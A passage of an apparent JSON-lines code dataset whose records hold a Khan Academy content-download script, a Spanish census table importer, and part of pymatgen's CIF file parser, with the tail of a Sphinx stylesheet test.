\"\"\"\n    Test that a closed issue is struck through.\n    \"\"\"\n    assert text_decoration == 'line-through'\n","repo_name":"ignatenkobrain/sphinxcontrib-issuetracker","sub_path":"tests/test_stylesheet.py","file_name":"test_stylesheet.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"86"}
+{"seq_id":"40467445068","text":"#!/usr/bin/env python3\nimport kapi\nimport argparse, sys\n\ndef read_cmd():\n    \"\"\"Function for reading command line options.\"\"\"\n    desc = \"Script for downloading Khan Academy content tree.\"\n    parser = argparse.ArgumentParser(description=desc)\n    parser.add_argument('-c','--content', dest='content_type', required = True, help='Which kind of content should we download? Options: video|exercise|article|topic')\n    parser.add_argument('-l', '--lang', dest='lang', default = 'en', help='Language of the topic tree. 
(US by default)')\n return parser.parse_args()\n\n# Currently, article type does not work\n# Each article need to be downloaded separately via kapi.download_article(article_id)\nAVAILABLE_CONTENT_TYPES = ['video', 'exercise', 'topic']\n\nif __name__ == \"__main__\":\n\n opts = read_cmd()\n\n if opts.content_type not in AVAILABLE_CONTENT_TYPES:\n print(\"ERROR: invalid content type argument:\", opts.content_type)\n print(\"Available:\", AVAILABLE_CONTENT_TYPES)\n exit(1)\n\n khan_tree = kapi.KhanContentTree(opts.lang, opts.content_type)\n khan_api = kapi.KhanAPI(opts.lang)\n tree = khan_api.download_topic_tree(opts.content_type)\n if tree is not None:\n khan_tree.save(tree)\n print(\"Successfully downloaded Khan %s topic tree for locale %s\" % (opts.content_type, opts.lang))\n else:\n print(\"ERROR: Could not download topic tree for locale \" + opts.lang)\n sys.exit(1)\n\n","repo_name":"KhanovaSkola/KSTools","sub_path":"ka_deprecated/download_khan_tree.py","file_name":"download_khan_tree.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"86362657017","text":"import re\nimport os\nfrom zipfile import ZipFile\n\nimport xlrd\n\nfrom datasource_common.dataset_importer import DatasetTemporaryTableImporter\nfrom datasource_common.dataset_provider import DatasetProvider\nfrom datasource_common.downloads import download_file\nfrom datasource_common.log import log\n\n\nINDICATORS_FILE_URL = 'http://www.ine.es/censos2011_datos/indicadores_seccen_rejilla.xls'\nCENSUS_DATA_URL = 'http://www.ine.es/censos2011_datos/indicadores_seccion_censal_csv.zip'\n\n\nclass CensusProvider(DatasetProvider):\n def get_dataset(self):\n indicators_file = self.download_indicators()\n census_zip_file = self.download_census_zip()\n census_csv_files = self.extract_census_csv_files(census_zip_file)\n return {\n 'indicators_file': indicators_file,\n 'census_csv_files': census_csv_files,\n }\n\n def download_indicators(self):\n description_file = os.path.join(self.tmpdir.name, 'indicators.xls')\n log.info('Downloading indicators file')\n download_file(INDICATORS_FILE_URL, description_file)\n return description_file\n\n def download_census_zip(self):\n census_zip_file = os.path.join(self.tmpdir.name, 'census_csv.zip')\n log.info('Downloading census data')\n download_file(CENSUS_DATA_URL, census_zip_file)\n return census_zip_file\n\n def extract_census_csv_files(self, census_zip_file):\n log.info('Extracting census data')\n with ZipFile(census_zip_file, 'r') as zip:\n csv_files = [\n os.path.join(self.tmpdir.name, filename)\n for filename in zip.namelist()\n if filename.endswith('.csv')\n ]\n zip.extractall(self.tmpdir.name)\n\n return csv_files\n\n\nclass CensusImporter(DatasetTemporaryTableImporter):\n table_name = 'census_spain'\n dataset_provider_class = CensusProvider\n\n def create_temporary_table(self):\n indicators = self._get_indicators()\n\n table_fields = [\n ('ccaa', 'CHAR(2) NOT NULL'),\n ('cpro', 'CHAR(2) NOT NULL'),\n ('cmun', 'CHAR(3) NOT NULL'),\n ('dist', 'CHAR(2) NOT NULL'),\n ('secc', 'CHAR(3) NOT NULL'),\n ]\n table_fields.extend([\n (indicator_code, 'BIGINT',)\n for indicator_code, _ in indicators\n ])\n\n field_sql = ',\\n'.join([\n f'{field_name} {field_type}'\n for field_name, field_type in table_fields\n ])\n log.info('Creating census table')\n self.cur.execute(\n f'CREATE TABLE {self.temporary_table_name} ({field_sql});'\n )\n for indicator_code, indicator_label in indicators:\n self.cur.execute(\n 
f'COMMENT ON COLUMN {self.temporary_table_name}.{indicator_code} IS %s;',\n (indicator_label,)\n )\n\n def _get_indicators(self):\n book = xlrd.open_workbook(self.dataset['indicators_file'])\n indicator_rx = re.compile(r't\\d+_\\d+')\n indicators = []\n\n for sheet in book.sheets():\n for row in sheet.get_rows():\n indicator_code = row[0].value\n if indicator_rx.fullmatch(indicator_code):\n indicator_label = row[1].value\n indicator = indicator_code, indicator_label,\n indicators.append(indicator)\n\n return indicators\n\n def populate_table(self):\n for csv_file in self.dataset['census_csv_files']:\n log.info('Importing data from: %s', os.path.basename(csv_file))\n with open(csv_file, 'rb') as f:\n f.readline() # skip the header\n self.cur.copy_from(f, self.temporary_table_name, sep=',', null='')\n\n def create_indexes(self):\n log.info('Creating census table indexes')\n self.cur.execute(\n 'ALTER TABLE {} '\n 'ADD PRIMARY KEY(cpro, cmun, dist, secc);'\n .format(self.temporary_table_name))\n self.cur.execute(\n 'CREATE INDEX province_municipality_idx ON {} '\n '(cpro, cmun);'\n .format(self.temporary_table_name))\n","repo_name":"vfernandezmartinez/open_data_catalog","sub_path":"spain_census_datasource/census.py","file_name":"census.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27711884648","text":"from __future__ import division, unicode_literals, print_function\n\nimport math\nimport re\nimport os\nimport textwrap\nimport warnings\nfrom collections import OrderedDict, deque\n\nimport six\nfrom six.moves import zip, cStringIO\n\nimport numpy as np\nfrom functools import partial\n\ntry:\n from inspect import getfullargspec as getargspec\nexcept ImportError:\n from inspect import getargspec\nfrom itertools import groupby\nfrom pymatgen.core.periodic_table import Element, Specie, get_el_sp, DummySpecie\nfrom monty.io import zopen\nfrom pymatgen.util.coord_utils import in_coord_list_pbc, pbc_diff, \\\n find_in_coord_list_pbc\nfrom monty.string import remove_non_ascii\nfrom pymatgen.core.lattice import Lattice\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.core.operations import SymmOp\nfrom pymatgen.symmetry.groups import SpaceGroup, SYMM_DATA\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\nfrom pymatgen.electronic_structure.core import Magmom\nfrom pymatgen.core.operations import MagSymmOp\nfrom pymatgen.symmetry.maggroups import MagneticSpaceGroup\n\n\"\"\"\nWrapper classes for Cif input and output from Structures.\n\"\"\"\n\n__author__ = \"Shyue Ping Ong, Will Richards, Matthew Horton\"\n__copyright__ = \"Copyright 2011, The Materials Project\"\n__version__ = \"4.0\"\n__maintainer__ = \"Shyue Ping Ong\"\n__email__ = \"shyuep@gmail.com\"\n__status__ = \"Production\"\n__date__ = \"Sep 23, 2011\"\n\nsub_spgrp = partial(re.sub, r\"[\\s_]\", \"\")\n\nspace_groups = {sub_spgrp(k): k\n for k in SYMM_DATA['space_group_encoding'].keys()}\n\nspace_groups.update({sub_spgrp(k): k\n for k in SYMM_DATA['space_group_encoding'].keys()})\n\n_COD_DATA = None\n\n\ndef _get_cod_data():\n global _COD_DATA\n if _COD_DATA is None:\n import pymatgen\n with open(os.path.join(pymatgen.symmetry.__path__[0],\n \"symm_ops.json\")) \\\n as f:\n import json\n _COD_DATA = json.load(f)\n\n return _COD_DATA\n\n\nclass CifBlock(object):\n maxlen = 70 # not quite 80 so we can deal with semicolons and things\n\n def __init__(self, data, 
loops, header):\n \"\"\"\n Object for storing cif data. All data is stored in a single dictionary.\n Data inside loops are stored in lists in the data dictionary, and\n information on which keys are grouped together are stored in the loops\n attribute.\n\n Args:\n data: dict or OrderedDict of data to go into the cif. Values should\n be convertible to string, or lists of these if the key is\n in a loop\n loops: list of lists of keys, grouped by which loop they should\n appear in\n header: name of the block (appears after the data_ on the first\n line)\n \"\"\"\n self.loops = loops\n self.data = data\n # AJ says: CIF Block names cannot be more than 75 characters or you\n # get an Exception\n self.header = header[:74]\n\n def __eq__(self, other):\n return self.loops == other.loops \\\n and self.data == other.data \\\n and self.header == other.header\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __str__(self):\n \"\"\"\n Returns the cif string for the data block\n \"\"\"\n s = [\"data_{}\".format(self.header)]\n keys = self.data.keys()\n written = []\n for k in keys:\n if k in written:\n continue\n for l in self.loops:\n # search for a corresponding loop\n if k in l:\n s.append(self._loop_to_string(l))\n written.extend(l)\n break\n if k not in written:\n # k didn't belong to a loop\n v = self._format_field(self.data[k])\n if len(k) + len(v) + 3 < self.maxlen:\n s.append(\"{} {}\".format(k, v))\n else:\n s.extend([k, v])\n return \"\\n\".join(s)\n\n def _loop_to_string(self, loop):\n s = \"loop_\"\n for l in loop:\n s += '\\n ' + l\n for fields in zip(*[self.data[k] for k in loop]):\n line = \"\\n\"\n for val in map(self._format_field, fields):\n if val[0] == \";\":\n s += line + \"\\n\" + val\n line = \"\\n\"\n elif len(line) + len(val) + 2 < self.maxlen:\n line += \" \" + val\n else:\n s += line\n line = '\\n ' + val\n s += line\n return s\n\n def _format_field(self, v):\n v = v.__str__().strip()\n if len(v) > self.maxlen:\n return ';\\n' + textwrap.fill(v, self.maxlen) + '\\n;'\n # add quotes if necessary\n if v == '':\n return '\"\"'\n if (\" \" in v or v[0] == \"_\") \\\n and not (v[0] == \"'\" and v[-1] == \"'\") \\\n and not (v[0] == '\"' and v[-1] == '\"'):\n if \"'\" in v:\n q = '\"'\n else:\n q = \"'\"\n v = q + v + q\n return v\n\n @classmethod\n def _process_string(cls, string):\n # remove comments\n string = re.sub(r\"(\\s|^)#.*$\", \"\", string, flags=re.MULTILINE)\n # remove empty lines\n string = re.sub(r\"^\\s*\\n\", \"\", string, flags=re.MULTILINE)\n # remove non_ascii\n string = remove_non_ascii(string)\n\n # since line breaks in .cif files are mostly meaningless,\n # break up into a stream of tokens to parse, rejoining multiline\n # strings (between semicolons)\n q = deque()\n multiline = False\n ml = []\n # this regex splits on spaces, except when in quotes.\n # starting quotes must not be preceded by non-whitespace\n # (these get eaten by the first expression)\n # ending quotes must not be followed by non-whitespace\n p = re.compile(r'''([^'\"\\s][\\S]*)|'(.*?)'(?!\\S)|\"(.*?)\"(?!\\S)''')\n for l in string.splitlines():\n if multiline:\n if l.startswith(\";\"):\n multiline = False\n q.append(('', '', '', ' '.join(ml)))\n ml = []\n l = l[1:].strip()\n else:\n ml.append(l)\n continue\n if l.startswith(\";\"):\n multiline = True\n ml.append(l[1:].strip())\n else:\n for s in p.findall(l):\n # s is tuple. 
location of the data in the tuple\n # depends on whether it was quoted in the input\n q.append(s)\n return q\n\n @classmethod\n def from_string(cls, string):\n q = cls._process_string(string)\n header = q.popleft()[0][5:]\n data = OrderedDict()\n loops = []\n while q:\n s = q.popleft()\n # cif keys aren't in quotes, so show up in s[0]\n if s[0] == \"_eof\":\n break\n if s[0].startswith(\"_\"):\n data[s[0]] = \"\".join(q.popleft())\n elif s[0].startswith(\"loop_\"):\n columns = []\n items = []\n while q:\n s = q[0]\n if s[0].startswith(\"loop_\") or not s[0].startswith(\"_\"):\n break\n columns.append(\"\".join(q.popleft()))\n data[columns[-1]] = []\n while q:\n s = q[0]\n if s[0].startswith(\"loop_\") or s[0].startswith(\"_\"):\n break\n items.append(\"\".join(q.popleft()))\n n = len(items) // len(columns)\n assert len(items) % n == 0\n loops.append(columns)\n for k, v in zip(columns * n, items):\n data[k].append(v.strip())\n elif \"\".join(s).strip() != \"\":\n warnings.warn(\"Possible error in cif format\"\n \" error at {}\".format(\"\".join(s).strip()))\n return cls(data, loops, header)\n\n\nclass CifFile(object):\n \"\"\"\n Reads and parses CifBlocks from a .cif file or string\n \"\"\"\n\n def __init__(self, data, orig_string=None, comment=None):\n \"\"\"\n Args:\n data (OrderedDict): Of CifBlock objects.å\n orig_string (str): The original cif string.\n comment (str): Comment string.\n \"\"\"\n self.data = data\n self.orig_string = orig_string\n self.comment = comment or \"# generated using pymatgen\"\n\n def __str__(self):\n s = [\"%s\" % v for v in self.data.values()]\n return self.comment + \"\\n\" + \"\\n\".join(s) + \"\\n\"\n\n @classmethod\n def from_string(cls, string):\n d = OrderedDict()\n for x in re.split(r\"^\\s*data_\", \"x\\n\" + string,\n flags=re.MULTILINE | re.DOTALL)[1:]:\n\n # Skip over Cif block that contains powder diffraction data.\n # Some elements in this block were missing from CIF files in Springer materials/Pauling file DBs.\n # This block anyway does not contain any structure information, and CifParser was also not parsing it.\n if 'powder_pattern' in re.split(r\"\\n\", x, 1)[0]:\n continue\n c = CifBlock.from_string(\"data_\" + x)\n d[c.header] = c\n return cls(d, string)\n\n @classmethod\n def from_file(cls, filename):\n with zopen(filename, \"rt\", errors=\"replace\") as f:\n return cls.from_string(f.read())\n\nclass CifParser(object):\n \"\"\"\n Parses a cif file\n\n Args:\n filename (str): Cif filename. bzipped or gzipped cifs are fine too.\n occupancy_tolerance (float): If total occupancy of a site is between 1\n and occupancy_tolerance, the occupancies will be scaled down to 1.\n site_tolerance (float): This tolerance is used to determine if two\n sites are sitting in the same position, in which case they will be\n combined to a single disordered site. Defaults to 1e-4.\n \"\"\"\n\n def __init__(self, filename, occupancy_tolerance=1., site_tolerance=1e-4):\n self._occupancy_tolerance = occupancy_tolerance\n self._site_tolerance = site_tolerance\n if isinstance(filename, six.string_types):\n self._cif = CifFile.from_file(filename)\n else:\n self._cif = CifFile.from_string(filename.read())\n\n # store if CIF contains features from non-core CIF dictionaries\n # e.g. 
magCIF\n self.feature_flags = {}\n\n def is_magcif():\n \"\"\"\n Checks to see if file appears to be a magCIF file (heuristic).\n \"\"\"\n # Doesn't seem to be a canonical way to test if file is magCIF or\n # not, so instead check for magnetic symmetry datanames\n prefixes = ['_space_group_magn', '_atom_site_moment', '_space_group_symop_magn']\n for d in self._cif.data.values():\n for k in d.data.keys():\n for prefix in prefixes:\n if prefix in k:\n return True\n return False\n\n self.feature_flags['magcif'] = is_magcif()\n\n def is_magcif_incommensurate():\n \"\"\"\n Checks to see if file contains an incommensurate magnetic\n structure (heuristic).\n \"\"\"\n # Doesn't seem to be a canonical way to test if magCIF file\n # describes incommensurate strucure or not, so instead check\n # for common datanames\n if not self.feature_flags[\"magcif\"]:\n return False\n prefixes = ['_cell_modulation_dimension', '_cell_wave_vector']\n for d in self._cif.data.values():\n for k in d.data.keys():\n for prefix in prefixes:\n if prefix in k:\n return True\n return False\n\n self.feature_flags['magcif_incommensurate'] = is_magcif_incommensurate()\n\n for k in self._cif.data.keys():\n # pass individual CifBlocks to _sanitize_data\n self._cif.data[k] = self._sanitize_data(self._cif.data[k])\n\n @staticmethod\n def from_string(cif_string, occupancy_tolerance=1.):\n \"\"\"\n Creates a CifParser from a string.\n\n Args:\n cif_string (str): String representation of a CIF.\n occupancy_tolerance (float): If total occupancy of a site is\n between 1 and occupancy_tolerance, the occupancies will be\n scaled down to 1.\n\n Returns:\n CifParser\n \"\"\"\n stream = cStringIO(cif_string)\n return CifParser(stream, occupancy_tolerance)\n\n def _sanitize_data(self, data):\n \"\"\"\n Some CIF files do not conform to spec. This function corrects\n known issues, particular in regards to Springer materials/\n Pauling files.\n\n This function is here so that CifParser can assume its\n input conforms to spec, simplifying its implementation.\n :param data: CifBlock\n :return: data CifBlock\n \"\"\"\n\n \"\"\"\n This part of the code deals with handling formats of data as found in\n CIF files extracted from the Springer Materials/Pauling File\n databases, and that are different from standard ICSD formats.\n \"\"\"\n\n # Check to see if \"_atom_site_type_symbol\" exists, as some test CIFs do\n # not contain this key.\n if \"_atom_site_type_symbol\" in data.data.keys():\n\n # Keep a track of which data row needs to be removed.\n # Example of a row: Nb,Zr '0.8Nb + 0.2Zr' .2a .m-3m 0 0 0 1 14\n # 'rhombic dodecahedron, Nb14'\n # Without this code, the above row in a structure would be parsed\n # as an ordered site with only Nb (since\n # CifParser would try to parse the first two characters of the\n # label \"Nb,Zr\") and occupancy=1.\n # However, this site is meant to be a disordered site with 0.8 of\n # Nb and 0.2 of Zr.\n idxs_to_remove = []\n\n new_atom_site_label = []\n new_atom_site_type_symbol = []\n new_atom_site_occupancy = []\n new_fract_x = []\n new_fract_y = []\n new_fract_z = []\n\n for idx, el_row in enumerate(data[\"_atom_site_label\"]):\n\n # CIF files from the Springer Materials/Pauling File have\n # switched the label and symbol. 
Thus, in the\n # above shown example row, '0.8Nb + 0.2Zr' is the symbol.\n # Below, we split the strings on ' + ' to\n # check if the length (or number of elements) in the label and\n # symbol are equal.\n if len(data[\"_atom_site_type_symbol\"][idx].split(' + ')) > \\\n len(data[\"_atom_site_label\"][idx].split(' + ')):\n\n # Dictionary to hold extracted elements and occupancies\n els_occu = {}\n\n # parse symbol to get element names and occupancy and store\n # in \"els_occu\"\n symbol_str = data[\"_atom_site_type_symbol\"][idx]\n symbol_str_lst = symbol_str.split(' + ')\n for elocc_idx in range(len(symbol_str_lst)):\n # Remove any bracketed items in the string\n symbol_str_lst[elocc_idx] = re.sub(r'\\([0-9]*\\)', '',\n symbol_str_lst[elocc_idx].strip())\n\n # Extract element name and its occupancy from the\n # string, and store it as a\n # key-value pair in \"els_occ\".\n els_occu[str(re.findall(r'\\D+', symbol_str_lst[\n elocc_idx].strip())[1]).replace('', '')] = \\\n float('0' + re.findall(r'\\.?\\d+', symbol_str_lst[\n elocc_idx].strip())[1])\n\n x = str2float(data[\"_atom_site_fract_x\"][idx])\n y = str2float(data[\"_atom_site_fract_y\"][idx])\n z = str2float(data[\"_atom_site_fract_z\"][idx])\n\n for et, occu in els_occu.items():\n # new atom site labels have 'fix' appended\n new_atom_site_label.append(et + '_fix' + str(len(new_atom_site_label)))\n new_atom_site_type_symbol.append(et)\n new_atom_site_occupancy.append(str(occu))\n new_fract_x.append(str(x))\n new_fract_y.append(str(y))\n new_fract_z.append(str(z))\n\n idxs_to_remove.append(idx)\n\n # Remove the original row by iterating over all keys in the CIF\n # data looking for lists, which indicates\n # multiple data items, one for each row, and remove items from the\n # list that corresponds to the removed row,\n # so that it's not processed by the rest of this function (which\n # would result in an error).\n for original_key in data.data:\n if isinstance(data.data[original_key], list):\n for id in sorted(idxs_to_remove, reverse=True):\n del data.data[original_key][id]\n\n if len(idxs_to_remove) > 0:\n data.data[\"_atom_site_label\"] += new_atom_site_label\n data.data[\"_atom_site_type_symbol\"] += new_atom_site_type_symbol\n data.data[\"_atom_site_occupancy\"] += new_atom_site_occupancy\n data.data[\"_atom_site_fract_x\"] += new_fract_x\n data.data[\"_atom_site_fract_y\"] += new_fract_y\n data.data[\"_atom_site_fract_z\"] += new_fract_z\n\n \"\"\"\n This fixes inconsistencies in naming of several magCIF tags\n as a result of magCIF being in widespread use prior to\n specification being finalized (on advice of Branton Campbell).\n \"\"\"\n\n if self.feature_flags[\"magcif\"]:\n\n # CIF-1 style has all underscores, interim standard\n # had period before magn instead of before the final\n # component (e.g. 
xyz)\n correct_keys = [\"_space_group_symop_magn_operation.xyz\",\n \"_space_group_symop_magn_centering.xyz\",\n \"_space_group_magn.name_BNS\",\n \"_space_group_magn.number_BNS\"]\n\n # cannot mutate OrderedDict during enumeration,\n # so store changes we want to make\n changes_to_make = {}\n\n for original_key in data.data:\n for correct_key in correct_keys:\n # convert to all underscore\n trial_key = \"_\".join(correct_key.split(\".\"))\n test_key = \"_\".join(original_key.split(\".\"))\n if trial_key == test_key:\n changes_to_make[correct_key] = original_key\n\n # make changes\n for correct_key, original_key in changes_to_make.items():\n data.data[correct_key] = data.data[original_key]\n\n # some keys have been renamed, renamed_keys maps interim_keys to final_keys\n renamed_keys = {\"_magnetic_space_group.transform_to_standard_Pp_abc\":\n \"_space_group_magn.transform_BNS_Pp_abc\"}\n changes_to_make = {}\n\n for interim_key, final_key in renamed_keys.items():\n if data.data.get(interim_key):\n changes_to_make[final_key] = interim_key\n for final_key, interim_key in changes_to_make.items():\n data.data[final_key] = data.data[interim_key]\n\n return data\n\n def _unique_coords(self, coords_in, magmoms_in=None):\n \"\"\"\n Generate unique coordinates using coord and symmetry positions\n and also their corresponding magnetic moments, if supplied.\n \"\"\"\n coords = []\n if magmoms_in:\n magmoms = []\n magmoms_in = [Magmom(magmom) for magmom in magmoms_in]\n if len(magmoms_in) != len(coords_in):\n raise ValueError\n for tmp_coord, tmp_magmom in zip(coords_in, magmoms_in):\n for op in self.symmetry_operations:\n coord = op.operate(tmp_coord)\n coord = np.array([i - math.floor(i) for i in coord])\n if isinstance(op, MagSymmOp):\n magmom = Magmom(op.operate_magmom(tmp_magmom.moment))\n else:\n magmom = tmp_magmom\n if not in_coord_list_pbc(coords, coord,\n atol=self._site_tolerance):\n coords.append(coord)\n magmoms.append(magmom)\n return coords, magmoms\n else:\n for tmp_coord in coords_in:\n for op in self.symmetry_operations:\n coord = op.operate(tmp_coord)\n coord = np.array([i - math.floor(i) for i in coord])\n if not in_coord_list_pbc(coords, coord,\n atol=self._site_tolerance):\n coords.append(coord)\n return coords, [Magmom(0)]*len(coords) # return dummy magmoms\n\n def get_lattice(self, data, length_strings=(\"a\", \"b\", \"c\"),\n angle_strings=(\"alpha\", \"beta\", \"gamma\"),\n lattice_type=None):\n \"\"\"\n Generate the lattice from the provided lattice parameters. 
In\n the absence of all six lattice parameters, the crystal system\n and necessary parameters are parsed\n \"\"\"\n try:\n\n lengths = [str2float(data[\"_cell_length_\" + i])\n for i in length_strings]\n angles = [str2float(data[\"_cell_angle_\" + i])\n for i in angle_strings]\n if not lattice_type:\n return Lattice.from_lengths_and_angles(lengths, angles)\n\n else:\n return getattr(Lattice, lattice_type)(*(lengths + angles))\n\n except KeyError:\n # Missing Key search for cell setting\n for lattice_lable in [\"_symmetry_cell_setting\",\n \"_space_group_crystal_system\"]:\n if data.data.get(lattice_lable):\n lattice_type = data.data.get(lattice_lable).lower()\n try:\n\n required_args = getargspec(\n getattr(Lattice, lattice_type)).args\n\n lengths = (l for l in length_strings\n if l in required_args)\n angles = (a for a in angle_strings\n if a in required_args)\n return self.get_lattice(data, lengths, angles,\n lattice_type=lattice_type)\n except AttributeError as exc:\n warnings.warn(exc)\n\n else:\n return None\n\n def get_symops(self, data):\n \"\"\"\n In order to generate symmetry equivalent positions, the symmetry\n operations are parsed. If the symops are not present, the space\n group symbol is parsed, and symops are generated.\n \"\"\"\n symops = []\n for symmetry_label in [\"_symmetry_equiv_pos_as_xyz\",\n \"_symmetry_equiv_pos_as_xyz_\",\n \"_space_group_symop_operation_xyz\",\n \"_space_group_symop_operation_xyz_\"]:\n if data.data.get(symmetry_label):\n xyz = data.data.get(symmetry_label)\n if isinstance(xyz, six.string_types):\n warnings.warn(\"A 1-line symmetry op P1 CIF is detected!\")\n xyz = [xyz]\n try:\n symops = [SymmOp.from_xyz_string(s)\n for s in xyz]\n break\n except ValueError:\n continue\n if not symops:\n # Try to parse symbol\n for symmetry_label in [\"_symmetry_space_group_name_H-M\",\n \"_symmetry_space_group_name_H_M\",\n \"_symmetry_space_group_name_H-M_\",\n \"_symmetry_space_group_name_H_M_\",\n \"_space_group_name_Hall\",\n \"_space_group_name_Hall_\",\n \"_space_group_name_H-M_alt\",\n \"_space_group_name_H-M_alt_\",\n \"_symmetry_space_group_name_hall\",\n \"_symmetry_space_group_name_hall_\",\n \"_symmetry_space_group_name_h-m\",\n \"_symmetry_space_group_name_h-m_\"]:\n sg = data.data.get(symmetry_label)\n\n if sg:\n sg = sub_spgrp(sg)\n try:\n spg = space_groups.get(sg)\n if spg:\n symops = SpaceGroup(spg).symmetry_ops\n warnings.warn(\n \"No _symmetry_equiv_pos_as_xyz type key found. \"\n \"Spacegroup from %s used.\" % symmetry_label)\n break\n except ValueError:\n # Ignore any errors\n pass\n\n try:\n for d in _get_cod_data():\n if sg == re.sub(r\"\\s+\", \"\",\n d[\"hermann_mauguin\"]):\n xyz = d[\"symops\"]\n symops = [SymmOp.from_xyz_string(s)\n for s in xyz]\n warnings.warn(\n \"No _symmetry_equiv_pos_as_xyz type key found. \"\n \"Spacegroup from %s used.\" % symmetry_label)\n break\n except Exception as ex:\n continue\n\n if symops:\n break\n if not symops:\n # Try to parse International number\n for symmetry_label in [\"_space_group_IT_number\",\n \"_space_group_IT_number_\",\n \"_symmetry_Int_Tables_number\",\n \"_symmetry_Int_Tables_number_\"]:\n if data.data.get(symmetry_label):\n try:\n i = int(str2float(data.data.get(symmetry_label)))\n symops = SpaceGroup.from_int_number(i).symmetry_ops\n break\n except ValueError:\n continue\n\n if not symops:\n warnings.warn(\"No _symmetry_equiv_pos_as_xyz type key found. 
\"\n \"Defaulting to P1.\")\n symops = [SymmOp.from_xyz_string(s) for s in ['x', 'y', 'z']]\n\n return symops\n\n def get_magsymops(self, data):\n \"\"\"\n Equivalent to get_symops except for magnetic symmetry groups.\n Separate function since additional operation for time reversal symmetry\n (which changes magnetic moments on sites) needs to be returned.\n \"\"\"\n magsymmops = []\n\n # check to see if magCIF file explicitly contains magnetic symmetry operations\n if data.data.get(\"_space_group_symop_magn_operation.xyz\"):\n\n xyzt = data.data.get(\"_space_group_symop_magn_operation.xyz\")\n if isinstance(xyzt, six.string_types):\n xyzt = [xyzt]\n magsymmops = [MagSymmOp.from_xyzt_string(s) for s in xyzt]\n\n if data.data.get(\"_space_group_symop_magn_centering.xyz\"):\n\n xyzt = data.data.get(\"_space_group_symop_magn_centering.xyz\")\n if isinstance(xyzt, six.string_types):\n xyzt = [xyzt]\n centering_symops = [MagSymmOp.from_xyzt_string(s) for s in xyzt]\n\n all_ops = []\n for op in magsymmops:\n for centering_op in centering_symops:\n new_translation = [i - np.floor(i) for i\n in op.translation_vector + centering_op.translation_vector]\n new_time_reversal = op.time_reversal * centering_op.time_reversal\n all_ops.append(MagSymmOp.from_rotation_and_translation_and_time_reversal(\n rotation_matrix=op.rotation_matrix, translation_vec=new_translation,\n time_reversal=new_time_reversal))\n magsymmops = all_ops\n\n # else check to see if it specifies a magnetic space group\n elif data.data.get(\"_space_group_magn.name_BNS\") or data.data.get(\"_space_group_magn.number_BNS\"):\n\n if data.data.get(\"_space_group_magn.name_BNS\"):\n # get BNS label for MagneticSpaceGroup()\n id = data.data.get(\"_space_group_magn.name_BNS\")\n else:\n # get BNS number for MagneticSpaceGroup()\n # by converting string to list of ints\n id = list(map(int, (data.data.get(\"_space_group_magn.number_BNS\").split(\".\"))))\n\n msg = MagneticSpaceGroup(id)\n\n if data.data.get(\"_space_group_magn.transform_BNS_Pp_abc\"):\n if data.data.get(\"_space_group_magn.transform_BNS_Pp_abc\") != \"a,b,c;0,0,0\":\n return NotImplementedError(\"Non-standard settings not currently supported.\")\n elif data.data.get(\"_space_group_magn.transform_BNS_Pp\"):\n return NotImplementedError(\"Incomplete specification to implement.\")\n\n magsymmops = msg.symmetry_ops\n\n if not magsymmops:\n warnings.warn(\"No magnetic symmetry detected, using primitive symmetry.\")\n magsymmops = [MagSymmOp.from_xyzt_string(\"x, y, z, 1\")]\n\n return magsymmops\n\n def parse_oxi_states(self, data):\n \"\"\"\n Parse oxidation states from data dictionary\n \"\"\"\n try:\n oxi_states = {\n data[\"_atom_type_symbol\"][i]:\n str2float(data[\"_atom_type_oxidation_number\"][i])\n for i in range(len(data[\"_atom_type_symbol\"]))}\n # attempt to strip oxidation state from _atom_type_symbol\n # in case the label does not contain an oxidation state\n for i, symbol in enumerate(data[\"_atom_type_symbol\"]):\n oxi_states[re.sub(r\"\\d?[\\+,\\-]?$\", \"\", symbol)] = \\\n str2float(data[\"_atom_type_oxidation_number\"][i])\n\n except (ValueError, KeyError):\n oxi_states = None\n return oxi_states\n\n def parse_magmoms(self, data, lattice=None):\n \"\"\"\n Parse atomic magnetic moments from data dictionary\n \"\"\"\n if lattice is None:\n raise Exception('Magmoms given in terms of crystal axes in magCIF spec.')\n try:\n magmoms = {\n data[\"_atom_site_moment_label\"][i]:\n 
Magmom.from_moment_relative_to_crystal_axes([str2float(data[\"_atom_site_moment_crystalaxis_x\"][i]),\n str2float(data[\"_atom_site_moment_crystalaxis_y\"][i]),\n str2float(data[\"_atom_site_moment_crystalaxis_z\"][i])],\n lattice)\n for i in range(len(data[\"_atom_site_moment_label\"]))\n }\n except (ValueError, KeyError):\n return None\n return magmoms\n\n def _get_structure(self, data, primitive):\n \"\"\"\n Generate structure from part of the cif.\n \"\"\"\n\n def parse_symbol(sym):\n # Common representations for elements/water in cif files\n # TODO: fix inconsistent handling of water\n special = {\"D\": \"D\", \"Hw\": \"H\", \"Ow\": \"O\", \"Wat\": \"O\",\n \"wat\": \"O\", \"OH\": \"\", \"OH2\": \"\"}\n m = re.findall(r\"w?[A-Z][a-z]*\", sym)\n if m and m != \"?\":\n if sym in special:\n v = special[sym]\n else:\n v = special.get(m[0], m[0])\n if len(m) > 1 or (m[0] in special):\n warnings.warn(\"{} parsed as {}\".format(sym, v))\n return v\n\n lattice = self.get_lattice(data)\n\n # if magCIF, get magnetic symmetry moments and magmoms\n # else standard CIF, and use empty magmom dict\n if self.feature_flags[\"magcif_incommensurate\"]:\n raise NotImplementedError(\"Incommensurate structures not currently supported.\")\n elif self.feature_flags[\"magcif\"]:\n self.symmetry_operations = self.get_magsymops(data)\n magmoms = self.parse_magmoms(data, lattice=lattice)\n else:\n self.symmetry_operations = self.get_symops(data)\n magmoms = {}\n\n oxi_states = self.parse_oxi_states(data)\n\n coord_to_species = OrderedDict()\n coord_to_magmoms = OrderedDict()\n\n def get_matching_coord(coord):\n keys = list(coord_to_species.keys())\n coords = np.array(keys)\n for op in self.symmetry_operations:\n c = op.operate(coord)\n inds = find_in_coord_list_pbc(coords, c, atol=self._site_tolerance)\n # cant use if inds, because python is dumb and np.array([0]) evaluates\n # to False\n if len(inds):\n return keys[inds[0]]\n return 